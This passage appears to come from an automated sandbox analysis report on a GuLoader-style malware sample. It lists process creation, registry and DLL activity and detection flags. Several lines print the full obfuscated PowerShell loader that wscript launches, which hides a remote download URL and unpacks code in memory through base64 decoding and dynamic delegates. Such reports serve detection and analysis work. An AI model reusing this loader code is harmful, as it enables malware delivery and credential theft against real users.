            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Binary string: .Core.pdb.s source: powershell.exe, 0000000A.00000002.2283297279.0000000007B7A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2283297279.0000000007AD9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: nagement.Automation.pdb source: powershell.exe, 0000000A.00000002.2287976450.0000000008C96000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reser", "0")
            Yara detected GuLoader
            Source: Yara matchFile source: 0000000A.00000002.2280052237.00000000063C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.2282807652.0000000007520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2604034817.000001B6D16B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2955442534.0000000003D44000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.2288203195.00000000096F4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Egotripperne74)$global:Gemitorial = [System.Text.Encoding]::ASCII.GetString($Unlaborable)$global:Trskomageren=$Gemitorial.substring(303423,29428)<#Interregimental Sidegade Samlingsre
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Kakaoen $Xylopia $Tilegnelsesevnes), (Blodtryks @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Subalterns23 = [AppDomain]::CurrentDomain.GetAssemblies()$g
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Butterworker224)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Adresseforskydningen, $false).DefineType(
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Egotripperne74)$global:Gemitorial = [System.Text.Encoding]::ASCII.GetString($Unlaborable)$global:Trskomageren=$Gemitorial.substring(303423,29428)<#Interregimental Sidegade Samlingsre
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasS
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasS
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasSJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasSJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_07D708C2 push eax; mov dword ptr [esp], ecx10_2_07D70AC4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08A21CB8 push esi; ret 10_2_08A21CC2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08A21C88 push ebp; ret 10_2_08A21C92
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08A21C98 push edi; ret 10_2_08A21D02
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08A21CF8 push edi; ret 10_2_08A21D42
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08A21C68 push ebp; ret 10_2_08A21C72
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08A21C4D push ebp; ret 10_2_08A21C62
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08A20D80 push cs; ret 10_2_08A20E66
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08A20EF0 push cs; ret 10_2_08A20EFE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08A2166A push 0000005Eh; iretd 10_2_08A21696
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08A207B5 push es; ret 10_2_08A207BA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08A24325 pushfd ; ret 10_2_08A2432A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08A20F10 push cs; ret 10_2_08A20F1E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_09632343 push 0000007Fh; retf 10_2_09632345
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_09634922 pushfd ; retf 10_2_09634929
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0963310F push ebp; ret 10_2_09633113
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0963438B push 0000007Dh; iretd 10_2_0963438D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_09630648 push edx; iretd 10_2_09630649
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_096348C3 pushfd ; ret 10_2_096348D1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_09633690 pushfd ; retf 10_2_09633691
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
